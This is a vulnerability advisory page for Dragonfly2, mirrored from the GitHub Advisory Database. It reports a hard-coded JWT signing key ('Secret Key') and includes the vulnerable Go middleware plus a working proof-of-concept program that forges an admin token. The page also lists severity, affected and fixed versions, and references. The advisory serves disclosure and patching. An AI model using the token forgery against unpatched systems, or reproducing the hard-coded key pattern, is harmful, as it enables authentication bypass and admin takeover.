Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1ocGM4LTd3cG0tODg5d84AA_sM
Dragonfly2 has hard coded cyptographic key
Summary
Hello dragonfly maintainer team, I would like to report a security issue concerning your JWT feature.
Details
Dragonfly uses JWT to verify user. However, the secret key for JWT, "Secret Key", is hard coded, which leads to authentication bypass
authMiddleware, err := jwt.New(&jwt.GinJWTMiddleware{
Realm: "Dragonfly",
Key: []byte("Secret Key"),
Timeout: 2 * 24 * time.Hour,
MaxRefresh: 2 * 24 * time.Hour,
IdentityKey: identityKey,
IdentityHandler: func(c *gin.Context) any {
claims := jwt.ExtractClaims(c)
id, ok := claims[identityKey]
if !ok {
c.JSON(http.StatusUnauthorized, gin.H{
"message": "Unavailable token: require user id",
})
c.Abort()
return nil
}
c.Set("id", id)
return id
})
PoC
Use code below to generate a jwt token
package main
import (
"errors"
"fmt"
"time"
"github.com/golang-jwt/jwt/v4"
)
func (stc *DragonflyTokenClaims) Valid() error {
// Verify expiry.
if stc.ExpiresAt <= time.Now().UTC().Unix() {
vErr := new(jwt.ValidationError)
vErr.Inner = errors.New("Token is expired")
vErr.Errors |= jwt.ValidationErrorExpired
return vErr
}
return nil
}
type DragonflyTokenClaims struct {
Id int32 `json:"id,omitempty"`
ExpiresAt int64 `json:"exp,omitempty"`
Issue int64 `json:"orig_iat,omitempty"`
}
func main() {
signingKey := "Secret Key"
token := jwt.NewWithClaims(jwt.SigningMethodHS256, &DragonflyTokenClaims{
ExpiresAt: time.Now().Add(time.Hour).Unix(),
Id: 1,
Issue: time.Now().Unix(),
})
signedToken, _ := token.SignedString([]byte(signingKey))
fmt.Println(signedToken)
}
And send request with JWT above , you can still get data without restriction.
Impact
An attacker can perform any action as a user with admin privileges.
Permalink: https://github.com/advisories/GHSA-hpc8-7wpm-889wJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocGM4LTd3cG0tODg5d84AA_sM
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: about 1 month ago
Updated: 26 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-hpc8-7wpm-889w, CVE-2023-27584
References:
- https://github.com/dragonflyoss/Dragonfly2/security/advisories/GHSA-hpc8-7wpm-889w
- https://github.com/dragonflyoss/Dragonfly2/commit/e9da69dc4048bf2a18a671be94616d85e3429433
- https://nvd.nist.gov/vuln/detail/CVE-2023-27584
- https://github.com/dragonflyoss/Dragonfly2/releases/tag/v2.0.9
- https://github.com/advisories/GHSA-hpc8-7wpm-889w
Blast Radius: 3.0
Affected Packages
go:d7y.io/dragonfly/v2
Dependent packages: 2Dependent repositories: 2
Downloads:
Affected Version Ranges: < 2.1.0-beta.1
Fixed in: 2.1.0-beta.1
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.30, 2.1.0-alpha.0, 2.1.0-alpha.1, 2.1.0-alpha.2, 2.1.0-alpha.3, 2.1.0-alpha.4, 2.1.0-alpha.5, 2.1.0-alpha.6, 2.1.0-alpha.7, 2.1.0-alpha.8, 2.1.0-alpha.9, 2.1.0-beta.0
All unaffected versions: 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.1.7, 2.1.8, 2.1.9, 2.1.10, 2.1.11, 2.1.12, 2.1.13, 2.1.14, 2.1.15, 2.1.16, 2.1.17, 2.1.18, 2.1.19, 2.1.20, 2.1.21, 2.1.22, 2.1.23, 2.1.24, 2.1.25, 2.1.26, 2.1.27, 2.1.28, 2.1.29, 2.1.30, 2.1.31, 2.1.32, 2.1.33, 2.1.34, 2.1.35, 2.1.36, 2.1.37, 2.1.38, 2.1.39, 2.1.40, 2.1.41, 2.1.42, 2.1.43, 2.1.44, 2.1.45, 2.1.46, 2.1.47, 2.1.48, 2.1.49, 2.1.50, 2.1.51, 2.1.52, 2.1.53, 2.1.54, 2.1.55, 2.1.56, 2.1.57, 2.1.58, 2.1.59